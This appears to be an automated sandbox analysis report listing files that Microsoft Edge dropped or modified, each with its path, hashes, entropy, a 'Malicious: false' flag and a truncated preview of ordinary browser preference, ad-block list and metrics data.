Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\52871cfc-de3c-4cad-a5bb-f7f15ae9ce7b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44608
Entropy (8bit):	6.097562582405125
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBiwurhDO6vP6OwbqHpdl3S4FHFndcGoup1Xl3jVz6:z/Ps+wsI7ynEx6QOJzchu3VlXr4CRo1
MD5:	AAABCF9764C915A52BC5ABE243AE7183
SHA1:	8DDFD9C84FA918A2F7A979597BA640ADF65E54F2
SHA-256:	00C509AB1C44517A131ABE9E50E4D26733EAA608FE6F807E04B835593898D464
SHA-512:	EAE95224C63316D174E13114E6369B30C4E67A373121B868364FEF1D7D2146B573A728CFBBE237F91F8428EAC44A7D50302C7BD73D386168B756B9BA258306E4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8d37b060-2b6c-4e8f-83a4-576425814f17.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44608
Entropy (8bit):	6.097562582405125
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBiwurhDO6vP6OwbqHpdl3S4FHFndcGoup1Xl3jVz6:z/Ps+wsI7ynEx6QOJzchu3VlXr4CRo1
MD5:	AAABCF9764C915A52BC5ABE243AE7183
SHA1:	8DDFD9C84FA918A2F7A979597BA640ADF65E54F2
SHA-256:	00C509AB1C44517A131ABE9E50E4D26733EAA608FE6F807E04B835593898D464
SHA-512:	EAE95224C63316D174E13114E6369B30C4E67A373121B868364FEF1D7D2146B573A728CFBBE237F91F8428EAC44A7D50302C7BD73D386168B756B9BA258306E4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8e4163d0-1fa7-4351-b5eb-dd1437c2e74c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45965
Entropy (8bit):	6.088988553453961
Encrypted:	false
SSDEEP:	768:mMkbJrT8IeQcrQgx99BJuIhDO6vP6OwbqHpFbZ46EFXP/vP2185CAoCGoup1Xl3A:mMk1rT8HR99a6QOJAP2185RoChu3VlX6
MD5:	B3CBDB0C313CD7521A80A71EBBAFB239
SHA1:	1F75314FFC8392CA753CAD96F528D2BFF094AD5D
SHA-256:	ABDCB97BF1E56908B13E80EEF19DFEAD1AFF906E6F498252DF106893CD98FCFD
SHA-512:	45D38F693374D5725C86209EFFDF6FD23A3BAB440ACDA088FD3D4BE325E700E89028B559B5129959B4EA5C69DCC16951BACCD306A6A44AD5D324D8D114A603B9
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8e461273-f40f-4919-b20a-4fc32f464354.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44706
Entropy (8bit):	6.097074036850124
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBPwurhDO6vP6OwbqHpFbZ46EFXP/vcGoup1Xl3jVu:z/Ps+wsI7yOE26QOJAchu3VlXr4CRo1
MD5:	A83F74E270C0660E69586663B0ABDF84
SHA1:	4F0464C0495EAFAB1882F1AACAA174B0E0B8EEFB
SHA-256:	38D75340ECC067370DB60E1E19B4693BFF7FF44F0086C9046685B12FD2E29923
SHA-512:	17A9F89A382595BAE51F8EFA0E82BD02B498001C36F8B9E41248962E7CF1EF0B6BC90D7EF8E37A7E95C059D3537D328BBDA4A7D8480685BAC3CDF1315097EF02
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\73239d79-c483-414f-8ba0-41f394c5cb90.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67328DE8-1E70.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.4859614925322844
Encrypted:	false
SSDEEP:	6144:sO6QJmTVhDlqN5ew0gq8+2hiFCzgXaH6yo8:GhDQN4y
MD5:	2FBEA6576689C0BE501DCFF6AFA5625F
SHA1:	E520DB7E951D8492B479E8C10C0C175A13791CC8
SHA-256:	00FB8CA6EAC79BB4835CE44EC98B352F19A4BD679A3924AC70C9B3E4A2B23493
SHA-512:	81EEAEFB6928738EC96743A34CEDFD6111D4AD68A76B48028149E970F6911355473498CCB217677F5FA3E62306AA6C56930E802642F00854FFAF11CFD826C14E
Malicious:	false
Preview:	...@..@...@.....C.].....@..................8...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".tybebp20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\27871fec-d060-497b-9b49-a30dc093b804.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57777748830668
Encrypted:	false
SSDEEP:	768:5uggtDWPNFf988F1+UoAYDCx9Tuqh0VfUC9xbog/OVaIkydAarwPjpOtua:5uggtDWPNFf98u1jaPIkAAf8tR
MD5:	B642418B12C1F5CC7FE087D0F934DFB3
SHA1:	C450F575FAFA81901584B0051BD37F906E8CE79B
SHA-256:	9FDC524EB2E2C25D8B808F8B2DD8F035D09F6290F26A100684DD46080F654FFD
SHA-512:	D7BE6DC601D5EF9352D96D24B7B596BBAAD56F75B307C0AAFB94257A6DD2A7A7533F4ACFF99EB80E3C94281C9433431DD5FD401765B623FAFD8C8D8EF3B6472C
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375839977094074","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375839977094074","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\31458fb5-5fa4-4ca8-b185-2244df57d4d8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17406), with no line terminators
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	5.486366996336428
Encrypted:	false
SSDEEP:	384:stVPGKSu4LsTXfhGpUgMoeN/f2bGzQwb6WklaTYV:snOxujXfBg6ebGsIyaTYV
MD5:	B3661C50B46E47ECC0C093810719C5E2
SHA1:	3794D4F56EB6271CB323058D3A9242A3F92C2C5D
SHA-256:	D6ADC3970E9CA2945438B28DC7B69D88D893BC1A575CB1FDF77A41F851E7E2E5
SHA-512:	497ACC5597FDD6F4669D99AAC45DA98CDF04584FA4CEF9AE91E23CC4603AC4C98A99D75034A7F269717AD0C953B65A05AB448F8EE48FB3FEC9EE88F6121EAE41
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\563b0310-9e92-4c2b-a08b-72f8ab4a2430.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8303466e-b540-467b-998c-d842fd58c5de.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17241), with no line terminators
Category:	dropped
Size (bytes):	17243
Entropy (8bit):	5.489945547523566
Encrypted:	false
SSDEEP:	384:stVPGKSu4LsTXfhGpUgMoeN/f2bGzQwb6WgaTYV:snOxujXfBg6ebGsIUaTYV
MD5:	740853795D320877666114760DC96B36
SHA1:	076C1080918FFBEE2E12944628D03FB8617E6B88
SHA-256:	39C161A49ED8553E03A7EDE2A2E7A0F40D73DC69AC8AFED6D6801C6872598E42
SHA-512:	A590F7E53CEFA73BF7AF67E972F9818E684846A1C8356129EB07A277766896FDDD128D652072CD41D36FCF72BBDE539255A2022A089D31E4073F47F81E908E22
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\893d8772-f6d7-420e-81fe-d9fb1a04550f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17406), with no line terminators
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	5.4864698132214444
Encrypted:	false
SSDEEP:	384:stVPGKSu4LsTXfhGpUgMoeN/f2bGzQwb6WUlaTYV:snOxujXfBg6ebGsIiaTYV
MD5:	C44415AA8FFF491734D47ED45B204B7C
SHA1:	78DB9E0EBD938F7888E36F1FD530ADA46A40C86D
SHA-256:	1EC4B452DBFD543457EFE2D856C8FFED7BB303483901B6254DE5D59C32FE233F
SHA-512:	E446B32E98CE8CA290E2C1ED5B39B5A7C8E0508B028D52B0FE77C02E30325A1AB4B6DE915CBCAC9F1649552925F2354033989C0E2D372706D88A30BF96113FA6
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2c